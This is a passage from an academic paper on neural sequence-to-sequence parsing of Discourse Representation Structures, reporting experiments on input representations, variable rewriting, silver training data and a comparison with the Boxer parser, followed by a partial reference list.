DRS with well-formed semantics. For each box variable in a discourse relation, ex- istence of the corresponding box inside the same segmented DRS is checked. For each entity vari- able in a condition, an introduction of the binder (i.e., accessible) discourse variable is found. The goal of these two steps is to prevent free occur- rences of variables in DRSs. While binding the entity variables, necessary accessibility relations between the boxes are induced. In the end, the checker verifies the transitive closure of the in- duced accessibility relation on loops and checks existence of a unique main box of the DRS. The checker is applied to every automatically obtained clausal form. If a clausal form fails the test, it is considered as ill-formed and will not have a single clause matched with the gold stan- dard when calculating the F-score. 3.3 Evaluation A DRS parser is evaluated by comparing its out- put DRS to a gold standard DRS using the Counter tool (van Noord et al., 2018). Counter calculates an F-score over matching clauses. Because variable names are meaningless, obtaining the matching clauses essentially is a search for the best variable mapping between two DRSs. Counter tries to find this mapping by performing a hill-climbing search with a predefined number of restarts to avoid get- ting stuck in a local optimum, which is similar to the evaluation system SMATCH (Cai and Knight, 2013) for AMR parsing.4 Counter generalizes over WordNet synsets (i.e., a system is not penalized for predicting a word sense that is in the same synset as the gold standard word sense). To calculate whether there is a significant differ- ence between two systems, we perform approxi- mate randomization (Noreen, 1989) with α = 0.05, R = 1,000, and F(model1) > F(model2) as test statistics for each individual DRS pair. 3.4 Neural Architecture We use a recurrent sequence-to-sequence neu- ral network (henceforth seq2seq) with two 4Counter ignores REF clauses in the calculation of the F-score because they are usually redundant and therefore inflate the final score (van Noord et al., 2018). 622 Tom is n't afraid of Encoder Decoder b1 REF x1 SEP b1 ... x2 anything Attention Figure 3: The sequence-to-sequence model with word-representation input. SEP is used as a spe- cial character to separate clauses in the output. bidirectional long short-term memory (LSTM) layers and 300 nodes, implemented in OpenNMT (Klein et al., 2017). The network encodes a se- quence representation of the natural language ut- terance, while the decoder produces the sequences of the meaning representation. We apply dropout (Srivastava et al., 2014) between both the recurrent encoding and decoding layers to prevent overfit- ting, and use general attention (Luong et al., 2015) to selectively give more weight to certain parts of the input sentence. An overview of the gen- eral framework of the seq2seq model is shown in Figure 3. During decoding we perform beam search with length normalization, which in neural machine translation (NMT) is crucial to obtaining good re- sults (Britz et al., 2017). We experimented with a wide range of parameter settings, of which the final settings can be found in Table 3. We opted against trying to find the best parame- ter settings for each individual experiment (next to impossible in terms of computing time nec- essary, as a single 10-fold CV experiment takes 12 hours on GPU), but selected parameter settings that showed good performance for both the initial character and word-level representations (see §4 for details). The parameter search was performed using 10-fold CV on the training set. Training is stopped when there is no more improvement in perplexity on the validation set, which in our case occurred after 13–15 epochs. A powerful, well-known technique in the field of NMT is to use an ensemble of models during decoding (Sutskever et al., 2014; Sennrich et al., 2016a). The resulting model averages over the pre- dictions of the individual models, which can bal- ance out some of the errors. In our experiments, we apply this method when decoding on the test set, but not for our experiments of 10-fold CV (this would take too much computation time). Parameter Value Parameter Value RNN-type LSTM dropout 0.2 encoder-type brnn dropout type naive optimizer sgd bridge copy layers 2 learning rate 0.7 nodes 300 learning rate decay 0.7 min freq source 3 max grad norm 5 min freq target 3 beam size 10 vector size 300 length normalization 0.9 Table 3: Parameters explored during training and testing with their final values. All other parameters have default values. 4 Experiments with Data Representations This section describes the experiments we con- duct regarding the data representations of the input (English sentences) and output (a DRS) during training. 4.1 Between Characters and Words We first try two (default) representations: character- level and word-level. Most semantic parsers use word-level representations for the input, but as a result are often dependent on pre-trained word em- beddings or anonymization of the input 5 to obtain good results. Character-level models avoid this issue but might be at a higher risk of producing ill-formed output. Character-based model In the character-level model, the input (an English sentence) is rep- resented as a sequence of individual characters. The output (a DRS in clause format) is lin- earized, with special characters indicating spaces and clause separators. The semantic roles (e.g., Agent, Theme), DRS operators (e.g., REF, NOT, POS), and deictic constants (e.g., "now", "speaker", "hearer") are not represented as character sequences, but treated as compound characters, meaning that REF is not treated as a sequence of R, E and F, but directly as REF. All proper names, WordNet senses, time/date expres- sions, and numerals are represented as character sequences. 5This is done to keep the vocabulary small. An exam- ple is to change all proper names to NAME in both the sentence and meaning representation during training. When producing output, the original names are restored by switch- ing NAME with a proper name found in the input sentence (Konstas et al., 2017). 623 Word-based model In the word-level model, the input is represented as a sequence of words, using spaces as a separator (i.e., the original words are kept). The output is the same as for the character-based model, except that the char- acter sequences are represented as words. We use pre-trained GloVe embeddings (Pennington et al., 2014)6 to initialize the encoder and decoder rep- resentations. In the DRS representation, there are semantic roles and DRS operators that might look like English words, but should not be interpreted as such (e.g. Agent, NOT). These entities are re- moved from the set of pre-trained embeddings, so that the model will learn them from scratch (start- ing from a random initialization). Hybrid representations: BPE We do not necessarily have to restrict ourselves to using only characters or words as input representa- tion. In NMT, byte-pair encoding (BPE; Sennrich et al. 2016b) is currently the de facto standard (Bojar et al., 2017). This is a frequency-based method that automatically finds a representation that is between character-level and word-level. It starts out with the character-level format and then does a predefined number of merges of frequently co-occurring characters. Tuning this number of merges determines whether the result- ing representation is closer to character-level or word-level. We explore a large range of merges (1k–100k), while applying a corresponding set of pre-trained BPE embeddings (Heinzerling and Strube, 2018). However, none of the BPE exper- iments improved on the character-level or word- level score (F-scores between 57 and 68), only coming close when using a small number of merges (which is very close to character-level any- way). Therefore this technique was disregarded for further experiments. Combined char and word There is also a fourth possible representation of the input: con- catenating the character-level and word-level rep- resentations. This is uncommon in NMT because of the large size of the embedding space (hence their preference for BPE), but possible here since the PMB data contain relatively short sentences. We simply add the word embedding vector af- ter the sequence of character-embeddings for each 6The Common Crawl version trained on 840 billion tokens, vector size 300. Model Prec Rec F-score % ill Char 78.1 69.7 73.7 6.2 Word 73.2 65.9 69.4 5.8 Char + Word 78.9 69.7 74.0 7.5 Table 4: Evaluating different input represen- tations. The percentage of ill-formed DRSs is denoted by % ill. word in the input and still initialize these embed- dings using the pre-trained GloVe embeddings. Representation results The results of the ex- periments (10-fold CV) for finding the best representation are shown in Table 4. Character representations are clearly better than word rep- resentations, though the word-level representation produces fewer ill-formed DRSs. Both represen- tations are maintained for our further experiments. Although the combination of characters and words did lead to a small increase in performance over characters only (Table 4), this difference is not sig- nificant. Hence, this representation is discarded in further experiments described in this paper. 4.2 Tokenization An interesting aspect of the PMB data is the way the input sentences are tokenized. In the data set, multiword expressions are tokenized as sin- gle words, for example, “New York” is tokenized to “New∼York.” Unfortunately, most off-the-shelf tokenizers (e.g., the Moses tokenizer) are not equipped to deal with this. We experiment with using Elephant (Evang et al., 2013), a tokenizer that can be (re-)trained on individual data sets, us- ing the tokenized sentences of the published silver and gold PMB data set.7 Simultaneously, we are interested in whether character-level models need tokenization at all, which would be a possible ad- vantage of this type of representing the input text. Results of the experiment are shown in Table 5. None of the two tokenization methods yielded a significant advantage for the character-level models, so they will not be used further. The word-level models, however, did benefit from to- kenization, but Elephant did not give us an ad- vantage over the Moses tokenizer. Therefore, for 7Gold tokenization is available in the data set, but using this would not reflect practical applications of DRS parsing, as we want raw text as input for a realistic setting. 624 b1 REF x1 b1 male "n.02" x1 b1 Name x1 "tom" b2 REF t1 b2 EQU t1 "now" b2 time "n.08" t1 b0 NOT b3 b3 REF s1 b3 Time s1 t1 b3 Experiencer s1 x1 b3 afraid "a.01" s1 b3 Stimulus s1 x2 b3 REF x2 b3 entity "n.01" x2 (a) Standard naming $1 REF @1 $1 male "n.02" @1 $1 Name @1 "tom" $2 REF @2 $2 EQU @2 "now" $2 time "n.08" @2 $0 NOT $3 $3 REF @3 $3 Time @3 @2 $3 Experiencer @3 @1 $3 afraid "a.01" @3 $3 Stimulus @3 @4 $3 REF @4 $3 entity "n.01" @4 (b) Absolute naming [NEW] REF 〈NEW〉 [0] male "n.02" 〈0〉 [0] Name 〈0〉 "tom" [NEW] REF 〈NEW〉 [0] EQU 〈0〉 "now" [0] time "n.08" 〈0〉 [NEW] NOT [NEW] [0] REF 〈NEW〉 [0] Time 〈0〉〈-1〉 [0] Experiencer 〈0〉〈-2〉 [0] afraid "a.01" 〈0〉 [0] Stimulus 〈0〉〈1〉 [0] REF 〈NEW〉 [0] entity "n.01" 〈0〉 (c) Relative naming Figure 4: Different methods of variable naming exemplified on the clausal form of Figure 1. For (c), positive numbers refer to introductions that have yet to occur, and negative numbers refer to known introductions. A zero refers to the previous introduction for that variable type. word-level models, we use Moses in our subse- quent experiments. 4.3 Representing Variables So far we did not attempt to do anything special with the variables that occur in DRSs, as we sim- ply tried to learn them as supplied in the PMB data set. Obviously, DRSs constitute a challenge for seq2seq models because of the high number of multiple occurrences of the same variables, in par- ticular compared with AMR. AMR parsers do not deal well with this, because the reentrancy metric (Damonte et al., 2017) is among the lowest met- rics for all AMR parsers that reported them or are publicly available (van Noord and Bos, 2017b). Moreover, for AMR, only 50% of the represen- tations contain at least one reentrant node, and only 20% of the triples in AMR contain a reen- trant node (van Noord and Bos, 2017a), but for DRSs these are both virtually 100%. Although seq2seq AMR parsers could get away with ig- noring variables during training and reinstating them in a post-processing step, for DRSs this is unfeasible. However, because variable names are chosen arbitrarily, they will be hard for a seq2seq model to learn. We will therefore experiment with two methods of rewriting the variables to a more gen- eral representation, distinguishing between box variables and discourse variables. Our first method (absolute) traverses down the list of clauses, rewriting each new variable to a unique represen- tation, taking the order into account. The second Char parser Word parser F1 % ill F1 % ill Baseline (bs) 73.7 6.2 69.4 5.8 Moses (mos) 74.1 4.8 71.8 5.8 Elephant (ele) 74.0 5.4 71.1 7.5 bs/mos + absolute (abs) 75.3 3.5 73.5 2.0 bs/mos + relative (rel) 76.3 4.2 74.2 3.1 bs/mos + rel + lowercase 75.8 3.6 74.9 3.1 bs/mos + rel + truecase 76.2 4.0 73.3 3.3 bs/mos + rel + feature 76.9 3.7 74.9 2.9 Table 5: Results of the 10-fold CV experiments re- garding tokenization, variable rewriting, and cas- ing; bs/mos means that we use no tokenization for the character-level parser, while we use Moses for the word-level parser. method (relative) is more sophisticated; it rewrites variables based on when they were introduced, inspired by the De Bruijn index (de Bruijn, 1972). We view box variables as introduced when they are first mentioned, and we take the REF clause of a discourse referent as their introduction. The two rewriting methods are illustrated in Figure 4. The results are shown in Table 5. For both char- acters and words, the relative rewriting method significantly outperforms the absolute method and the baseline, though the absolute method pro- duces fewer ill-formed DRSs. Interestingly, the character-level model still obtains a higher F1- score compared to the word-level model, even though it produces more ill-formed DRSs. 625 1000 1500 2000 2500 3000 3500 Training instances 40 45 50 55 60 65 70 75 F s co re Charlevel Wordlevel Figure 5: Learning curve for different number of gold instances for both the character-level and word-level neural parsers (10-fold CV experiment for every 500 instances). 4.4 Casing Casing is a writing device mostly used for punc- tuation purposes. On the one hand, it increases the set of characters (hence adding more redun- dant variation to the input). On the other hand, case can be a useful feature to recognize proper names because names of individuals are semanti- cally analysed as presuppositions. Explicitly en- coding uppercase with a feature could therefore prevent us from including a named-entity recog- nizer, often used in other semantic parsers. Al- though we do not expect dealing with case to be a major challenge, we try out different techniques to find an optimal balance between abstracting over input characters and parsing performance. The re- sults, in Table 5, show that the feature works well for the character-level model, but for the word- level model, it does not outperform lowercasing. These settings are used in further experiments. 5 Experiments with Additional Data Because semantic annotation is a difficult and time-consuming task, gold standard data sets are usually relatively small. This means that semantic parsers (and data-hungry neural methods in par- ticular) can often benefit from more training data. Some examples in semantic parsing are data re- combination (Jia and Liang, 2016), paraphrasing (Berant and Liang, 2014), or exploiting machine- generated output (Konstas et al., 2017). However, before we do any experiments using extra train- ing data, we want to be sure that we can still ben- Char parser Word parser Data F1 % ill F1 % ill Best gold-only 75.9 2.9 72.8 2.0 + ensemble 77.9 1.8 75.1 0.9 Gold + silver 82.9 1.8 82.7 1.1 + ensemble 83.6 1.3 83.1 0.7 Table 6: F1-score and percentage of ill-formed DRSs on the test set, for the experiments with the PMB-released silver data. The scores without us- ing an ensemble are an average of five runs of the model. efit from more gold training data. For both the character level and word level we plot the learn- ing curve, adding 500 training instances at a time, in Figure 5. For both models the F-score clearly still improves when using more training instances, which shows that there is at least the potential for additional data to improve the score. For DRSs, the PMB-2.1.0 release already con- tains a large set of silver standard data (71,308 in- stances), containing DRSs that are only partially manually corrected. We then train a model on both the gold and silver standard data, making no distinction between them during training. After train- ing we take the last model and restart the train- ing on only the gold data, in a similar process as described in Konstas et al. (2017) and van Noord and Bos (2017b). In general, restarting the train- ing to fine-tune the weights of the model is a com- mon technique in NMT (Denkowski and Neubig, 2017). We are aware that there are many methods to obtain and utilize additional data. However, our main aim is not to find the optimal method for DRS parsing, but to demonstrate that using additional data is indeed beneficial for neural DRS parsing. Because we are not further fine-tuning our model, we will show results on the test set in this section. Table 6 shows the results of adding the sil- ver data. This results in a large increase in per- formance, for both the character- and word-level models. We are still reliant on manually annotated data, however, because without the gold data (so training on only the silver data), we score even lower than our baseline model (68.4 and 68.1 for the char and word parser). Similarly, we are reliant on the fine-tuning procedure, as we also score be- low our baseline models without it (71.6 and 71.0 for the char and word parsers, respectively). 626 Char parser Word parser Data F1 % ill F1 % ill Silver (Boxer-generated) 83.6 1.3 83.1 0.7 Bronze (Boxer-generated) 83.8 1.1 82.4 0.9 Bronze (NN-generated) 77.9 2.7 74.5 2.2 without ill-formed DRSs 78.6 1.6 74.9 0.9 Table 7: Test set results of the experiments that analyze the impact of the silver data. We believe there are two possible factors that could explain why the addition of silver data re- sults in such a large improvement: (i) the fact that the data are silver instead of bronze or (ii) the fact that a different DRS parser (Boxer, see §6) is used to create the silver data instead of our own parser. We conduct an experiment to identify the impact on performance of silver versus bronze and Boxer versus our parser. The results are shown in Table 7. Note that these experiments are per- formed to analyze the impact of the silver data, not to further push the score, meaning Silver (Boxer- generated) is our final model that will be com- pared to other approaches in §6. For factor (i), we compare the performance of the model trained on silver and bronze versions of the exact same documents (so leaving out the man- ual corrections). Interestingly, we score slightly higher for the character-level model with bronze than with silver (though the difference is not statis- tically significant), meaning that the extra manual corrections are not beneficial (in their current for- mat). This suggests that the silver data are closer to bronze than to the gold standard. For factor (ii), we use our own best parser (with- out silver data) to parse the sentences in the PMB silver data release and use that as additional train- ing data.8 Because the silver data contain longer and more complicated sentences than the gold data, our best parser produces more ill-formed DRSs (13.7% for char and 15.6% for word). We can either discard those instances or still main- tain them for the model to learn from. For Boxer this is not an issue since only 0.3% of DRSs produced were ill-formed. We observe that a full self-training pipeline results in lower performance compared with using Boxer-produced DRSs. In fact, this does not seem to be beneficial over only using the gold standard data. Most likely, 8Note that we cannot apply the manual corrections, so in PMB terminology, these data are bronze instead of silver. Prec Rec F-score SPAR 48.0 33.9 39.7 SIM-SPAR 55.6 57.9 56.8 AMR2DRS 43.3 43.0 43.2 Boxer 75.7 72.9 74.3 Neural Char 79.7 76.2 77.9 Neural Word 77.1 73.3 75.1 Neural Char + silver 84.7 82.4 83.6 Neural Word + silver 84.0 82.3 83.1 Table 8: Test set results of our best neural models compared to two baseline models and two parsers. because Boxer combines symbolic and statistical methods, it learns very different things from our neural parsers, which in turn provides more valu- able information to the model. A more detailed analysis on the difference in (semantic) output is performed in §6.2 and 6.3. Removing ill-formed DRSs before training leads to higher F-scores for both the char and word parsers, as well as a lower number of ill-formed DRSs. 6 Discussion 6.1 Comparison In this section, we compare our best neural mod- els (with and without silver data, see Table 6) with two baseline systems and with two DRS parsers: AMR2DRS and Boxer. AMR2DRS is a parser that obtains DRSs from AMRs by apply- ing a set of rules (van Noord et al., 2018), in our case using AMRs produced by the AMR parser of van Noord and Bos (2017b). Boxer is an existing DRS parser using a statistical combinatory cate- gorical grammar parser for syntactic analysis and a compositional semantics based on λ-calculus, fol- lowed by pronoun and presupposition resolution (Curran et al., 2007; Bos, 2008b). SPAR is a base- line parser that outputs the same (fixed) default DRS for each input sentence. We implemented a second baseline model, SIM-SPAR, which outputs, for each sentence in the test set, the DRS of the most similar sentence in the training set. This sim- ilarity is calculated by taking the cosine similar- ity of the average word embedding vector (with removed stopwords) based on the GloVe embed- dings (Pennington et al., 2014). Table 8 shows the result of the comparison. The neural models comfortably outperform the baselines. We see that both our neural models 627 Char Word Boxer All clauses 83.6 83.1 74.3 DRS Operators 93.2 93.3 88.0 VerbNet roles 84.1 82.5 71.4 WordNet synsets 79.7 79.4 72.5 nouns 86.1 88.5 82.5 verbs, adverbs, adj. 65.1 58.7 49.3 Oracle sense numbers 86.7 85.7 78.1 Oracle synsets 90.7 90.9 83.8 Oracle roles 87.4 87.2 82.0 Table 9: F-scores of fine-grained evaluation on the test set of the three semantic parsers. outperform Boxer by a large margin when using the Boxer-labeled silver data. However, even with- out this dependence, the neural models perform significantly better than Boxer. It is worth noting that the character-level model significantly outper- forms the word-level model, even though it can- not benefit from pre-trained word embeddings and from a tokenizer. Concurrently with our work, a neural DRS parser has been developed by Liu et al. (2018). They use a customized neural seq2seq model that produces the DRS in three stages. It first pre- dicts the general (deep) structure of the DRSs, after which the conditions and referents are filled in. Unfortunately, they train and evaluate their parser on annotated data from the GMB rather than from the PMB (see §2). This, combined with the fact that their work is contemporaneous to the current paper, make it difficult to compare the ap- proaches. However, we see no apparent reason why their method should not work on the PMB data. 6.2 Analysis An intriguing question is what our models actually learn, and what parts of meaning are still challeng- ing for neural methods. We do this in two ways, by performing an automatic analysis and by doing a manual inspection on a variety of semantic phe- nomena. Table 9 shows an overview of the differ- ent automatic evaluation metrics we implemented, with corresponding scores of the three models. The character- and word-level systems perform comparably in all categories except for VerbNet roles, where the character-based parser shows a clear advantage (1.6 percentage point difference). The score for WordNet synsets is similar, but 3 4 5 6 7 8 9 10 Sentence length (words) 0.60 0.65 0.70 0.75 0.80 0.85 F- sc or e boxer char word Figure 6: Performance of each parser for sen- tences of different length. the word-level model has more difficulty predict- ing synsets that are introduced by verbs than for nouns. It is clear that the neural models outper- form Boxer consistently on each of these met- rics (partly because Boxer picks the first sense by default). What also stands out is the impact of the word senses: With a perfect word sense- disambiguation module (oracle senses), large im- provements can be gained for all three parsers. It is interesting to look at what errors the model makes in terms of producing ill-formed output. For both the neural parsers, only about 2% of the ill-formed DRSs are ill-formed because of a syntactic error in an individual clause (e.g., b1 Agent x1, where a fourth argument is missing), whereas all the other errors are due to a violated semantic constraint (see §3.2). In other words, the produced output is a syntactically well-formed DRS but is not interpretable. To find out how sentence length affects per- formance, we plot in Figure 6 the mean F-score obtained by each parser on input sentences of different lengths, from 3 to 10 words.9 We ob- serve that all the parsers degrade with sentence length. To identify whether any of the parsers de- grades significantly more than any other, we build a regression model in which we predict the F- score using as predictors the parser (char, word, and Boxer), the sentence length, and the num- ber of clauses produced. According to the re- gression model, (i) the performance of all three 9Shorter and longer sentences are excluded as there are fewer than 10 input sentences for any such length—for ex- ample, there are only three sentences that have two words. 628 systems decreases with sentence length, thus cor- roborating the trends shown in Figure 6 and (ii) the interaction between parser and sentence length is not significant (i.e., none of the parsers decreases significantly more than any other with sentence length). The fact that the performance of the neu- ral parsers degrades with sentence length is not surprising, because they are based on the seq2seq architecture, and models built on this architecture for other tasks, such as machine translation, have been shown to have the same issue (Toral and Sánchez-Cartagena, 2017). 6.3 Manual Inspection The automatic evaluation metrics provide overall scores but do not capture how the models per- form on certain semantic phenomena present in the DRSs. Therefore, we manually inspected the test set output of the three parsers for the seman- tic phenomena listed in Table 2. We here describe each phenomenon and explain how the parser out- put is evaluated on them. The negation & modals phenomenon cov- ers possibility (POS), necessity (NEC), and nega- tion (NOT). The phenomenon is considered successfully captured if an automatically pro- duced clausal form has the clause with the modal operator and the main concept is correctly put under the scope of the modal operator. For exam- ple, to capture the negation in Figure 1, the pres- ence of b0 NOT b3 and b3 afraid "a.01" s1 is sufficient. Scope ambiguity counts nested pairs of scopal operators such as possibility (POS), necessity (NEC), negation (NOT), and implication (IMP). Pronoun resolution checks if an anaphoric pronoun and its antecedent are represented by the same discourse referent. Discourse relation & implication involves deter- mining a discourse relation or an implication with a main concept in each of their scopes (i.e., boxes). For instance, to get the discourse relation in Fig- ure 2 correctly, a clausal form needs to include b0 CONTINUATION b1 b5, b1 play "v.03" e1, and b5 sing "v.01" e2. Finally, the embedded clauses phenomenon verifies whether the main verb concept of an embedded clause is placed inside the propositional box (PRP). This phe- nomenon also covers control verbs: It checks whether a controlled argument of a subordinate verb is correctly identified as an argument of a control verb. Phenomenon # Char Word Boxer Negation & modals 73 0.90 0.81 0.89 Scope ambiguity 15 0.73 0.57 0.80 Pronoun resolution 31 0.84 0.77 0.90 Discourse rel. & imp. 33 0.64 0.67 0.82 Embedded clauses 30 0.77 0.70 0.87 Table 10: Manual evaluation of the output of the three semantic parsers on several semantic phe- nomena. Reported numbers are accuracies. The results of the semantic evaluation of the parsers on the test set is given in Table 10. The character-level parser performs better than the word-level parser on all the phenomena ex- cept one. Even though both our neural parsers clearly outperformed Boxer in terms of F-score, they perform worse than Boxer on the selected se- mantic phenomena. Although the differences are not big, Boxer obtained the highest score for four out of five phenomena. This suggests that just the F-score is perhaps not good enough as an evalua- tion metric, or that the final F-score should perhaps be weighted towards certain clauses. For example, it is arguably more important to capture a nega- tion correctly than tense. Our current metric only gives a rough indication about the contents, but not about the inferential capabilities of the meaning representation. 7 Conclusions and Future Work We implemented a general, end-to-end neural seq2seq model that is able to produce well-formed DRSs with high accuracy (RQ1). Character-level models can outperform word-level models, even though they are not dependent on tokenization and pre-trained word embeddings (RQ2). It is beneficial to rewrite DRS variables to a more general representation (RQ3). Obtaining and us- ing additional data can benefit performance as well, though it might be better to use an exter- nal parser rather than doing a full self-training pipeline (RQ4). F-score is only a rough measure for semantic accuracy: Boxer still outperformed our best neural models on a subset of specific semantic phenomena (RQ5). We think there are many opportunities for fu- ture work. Because the sentences in the PMB data set are relatively short, it makes sense to investi- gate seq2seq models performing well for longer texts. There are a few promising directions here 629 that could combat the degrading performance on longer sentences. First, the Transformer model (Vaswani et al., 2017) is an interesting candidate for exploration, a state-of-the-art neural model de- veloped for MT that does not have worse perfor- mance for longer sentences. Second, a seq2seq model that is able to first predict the general struc- ture of the DRS, after which it can fill in the de- tails, similar to Liu et al. (2018), is something that could be explored. A third possibility is a neural parser that tries to build the DRS incrementally, producing clauses for different parts of the sen- tence individually, and then combining them to a final DRS. Concerning the evaluation of DRS parsers, we feel there are a couple of issues that could be addressed in future work. One idea is to facil- itate computing F-scores tailored to specific se- mantic phenomena that are dubbed important, so the evaluation we performed in this paper manu- ally could be carried out automatically. Another idea is to evaluate the application of DRSs to improve performance on other linguistic or seman- tic tasks in which DRSs that capture the full se- mantics will, presumably, have an advantage. A combination of glass-box and black-box evalua- tion seems a promising direction here (Bos, 2008a; van Noord et al., 2018). Acknowledgments This work was funded by the NWO-VICI grant “Lost in Translation—Found in Meaning” (288- 89-003). The Tesla K40 GPU used in this work was kindly donated to us by the NVIDIA Corpo- ration. We also want to thank the three anonymous reviewers for their comments. References Lasha Abzianidze, Johannes Bjerva, Kilian Evang, Hessel Haagsma, Rik van Noord, Pierre Ludmann, Duc-Duy Nguyen, and Johan Bos. 2017. The Parallel Meaning Bank: Towards a multilingual corpus of translations annotated with compositional meaning representations. In Proceedings of the 15th Conference of the Eu- ropean Chapter of the Association for Compu- tational Linguistics: Volume 2, Short Papers, pages 242–247, Valencia, Spain. Association for Computational Linguistics. Lasha Abzianidze and Johan Bos. 2017. Towards universal semantic tagging. In Proceedings of the 12th International Conference on Computa- tional Semantics (IWCS 2017) – Short Papers, Montpellier, France. Association for Computa- tional Linguistics. David Alvarez-Melis and Tommi S. Jaakkola. 2017. Tree-structured decoding with doubly- recurrent neural networks. In Proceedings of the International Conference on Learning Repre- sentations (ICLR). Nicholas Asher. 1993. Reference to Abstract Objects in Discourse. Kluwer Academic Publishers. Nicholas. Asher and Alex. Lascarides. 2003. Log- ics of Conversation. Studies in natural language processing. Cambridge University Press. Laura Banarescu, Claire Bonial, Shu Cai, Madalina Georgescu, Kira Griffitt, Ulf Hermjakob, Kevin Knight, Philipp Koehn, Martha Palmer, and Nathan Schneider. 2013. Abstract Meaning Representation for sem- banking. In Proceedings of the 7th Linguistic Annotation Workshop and Interoperability with Discourse, pages 178–186, Sofia, Bulgaria. Valerio Basile, Johan Bos, Kilian Evang, and Noortje Venhuizen. 2012. Developing a large semantically annotated corpus. In Proceedings of the Eighth International Conference on Lan- guage Resources and Evaluation (LREC 2012), pages 3196–3200, Istanbul, Turkey. David I. Beaver. 2002. Presupposition projection in DRT: A critical assesment. In The Con- struction of Meaning, pages 23–43. Stanford University. Jonathan Berant and Percy Liang. 2014. Seman- tic parsing via paraphrasing. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 1415–1425. Johannes Bjerva, Barbara Plank, and Johan Bos. 2016. Semantic tagging with deep resid- ual networks. In Proceedings of COLING 2016, the 26th International Conference on Computational Linguistics: Technical Papers, pages 3531–3541, Osaka, Japan. 630 http://www.aclweb.org/anthology/E17-2039 http://www.aclweb.org/anthology/E17-2039 http://www.aclweb.org/anthology/E17-2039 http://aclweb.org/anthology/W17-6901 http://aclweb.org/anthology/W17-6901 http://books.google.com.au/books?id=VD-8yisFhBwC http://books.google.com.au/books?id=VD-8yisFhBwC http://www.aclweb.org/anthology/W13-2322 http://www.aclweb.org/anthology/W13-2322 Patrick Blackburn and Johan Bos. 2005. Repre- sentation and Inference for Natural Language. A First Course in Computational Semantics. CSLI. Ondřej Bojar, Rajen Chatterjee, Christian Federmann, Yvette Graham, Barry Haddow, Shujian Huang, Matthias Huck, Philipp Koehn, Qun Liu, Varvara Logacheva, Christof Monz, Matteo Negri, Matt Post, Raphael Rubino, Lucia Specia, and Marco Turchi. 2017. Find- ings of the 2017 conference on machine translation (WMT17). In Proceedings of the Second Conference on Machine Translation, Volume 2: Shared Task Papers, pages 169–214, Copenhagen, Denmark. Association for Computational Linguistics. Claire Bonial, William J. Corvey, Martha Palmer, Volha Petukhova, and Harry Bunt. 2011. A hi- erarchical unification of LIRICS and VerbNet semantic roles. In Proceedings of the 5th IEEE International Conference on Semantic Comput- ing (ICSC 2011), pages 483–489. Johan Bos. 2008a. Let’s not argue about seman- tics. In Proceedings of the 6th Language Resources and Evaluation Conference (LREC 2008), pages 2835–2840, Marrakech, Morocco. Johan Bos. 2008b. Wide-coverage semantic anal- ysis with boxer. In Semantics in Text Pro- cessing. STEP 2008 Conference Proceedings, volume 1 of Research in Computational Seman- tics, pages 277–286. College Publications. Johan Bos. 2015. Open-domain semantic pars- ing with Boxer. In Proceedings of the 20th Nordic Conference of Computational Linguis- tics (NODALIDA 2015), pages 301–304. Johan Bos, Valerio Basile, Kilian Evang, Noortje Venhuizen, and Johannes Bjerva. 2017. The Groningen Meaning Bank. In Nancy Ide and James Pustejovsky, editors, Handbook of Lin- guistic Annotation. Springer Netherlands. Denny Britz, Anna Goldie, Minh-Thang Luong, and Quoc Le. 2017. Massive exploration of neural machine translation architectures. In Proceedings of the 2017 Conference on Empir- ical Methods in Natural Language Processing, pages 1442–1451. Nicolaas Govert de Bruijn. 1972. Lambda calcu- lus notation with nameless dummies, a tool for automatic formula manipulation, with applica- tion to the church-rosser theorem. In Indaga- tiones Mathematicae (Proceedings), volume 75, pages 381–392. Elsevier. Jan Buys and Phil Blunsom. 2017. Robust incremental neural semantic graph parsing. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 1215–1226. Shu Cai and Kevin Knight. 2013. Smatch: An evaluation metric for semantic feature struc- tures. In Proceedings of the 51st Annual Meeting of the Association for Computa- tional Linguistics (Volume 2: Short Papers), pages 748–752, Sofia, Bulgaria. Association for Computational Linguistics. James Curran, Stephen Clark, and Johan Bos. 2007. Linguistically motivated large-scale NLP with C&C and Boxer. In Proceedings of the 45th Annual Meeting of the Association for Computational Linguistics Companion Volume Proceedings of the Demo and Poster Sessions, pages 33–36, Prague, Czech Republic. Marco Damonte, Shay B. Cohen, and Giorgio Satta. 2017. An incremental parser for ab- stract meaning representation. In Proceedings of the 15th Conference of the European Chapter of the Association for Computational Linguis- tics: Volume 1, Long Papers, pages 536–546, Valencia, Spain. Association for Computational Linguistics. Michael Denkowski and Graham Neubig. 2017. Stronger baselines for trustable results in neu- ral machine translation. In Proceedings of the First Workshop on Neural Machine Translation, pages 18–27, Vancouver. Association for Com- putational Linguistics. Li Dong and Mirella Lapata. 2016. Language to logical form with neural attention. In Proceed- ings of the 54th Annual Meeting of the Associ- ation for Computational Linguistics (Volume 1: Long Papers), pages 33–43, Berlin, Germany. Association for Computational Linguistics. Jan van Eijck and Hans Kamp. 1997. Repre- senting discourse in context. In Johan van 631 http://www.aclweb.org/anthology/W17-4717 http://www.aclweb.org/anthology/W17-4717 http://www.aclweb.org/anthology/W17-4717 http://www.aclweb.org/anthology/W08-2222 http://www.aclweb.org/anthology/W08-2222 http://www.springer.com/la/book/9789402408799 http://www.springer.com/la/book/9789402408799 http://www.aclweb.org/anthology/P13-2131 http://www.aclweb.org/anthology/P13-2131 http://www.aclweb.org/anthology/P13-2131 Benthem and Alice ter Meulen, editors, Hand- book of Logic and Language, pages 179–240. Elsevier, MIT. Kilian Evang, Valerio Basile, Grzegorz Chrupała, and Johan Bos. 2013. Elephant: Sequence labeling for word and sentence segmentation. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Pro- cessing (EMNLP), pages 1422–1426, Seattle, Washington, USA. Christiane Fellbaum, editor. 1998. WordNet. An Electronic Lexical Database. The MIT Press, Cambridge, Ma., USA. Bart Geurts. 1999. Presuppositions and Pronouns, volume 3 of Current Research in the Semantic- s/Pragmatics interface. Elsevier. Xiaodong He and David Golub. 2016. Character- level question answering with attention. In Proceedings of the 2016 Conference on Empir- ical Methods in Natural Language Processing, pages 1598–1607. Benjamin Heinzerling and Michael Strube. 2018. BPEmb: Tokenization-free pre-trained subword embeddings in 275 languages. In Proceedings of the Eleventh International Conference on Language Resources and Evaluation (LREC 2018), Paris, France. European Language Resources Association (ELRA). Robin Jia and Percy Liang. 2016. Data recombina- tion for neural semantic parsing. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics 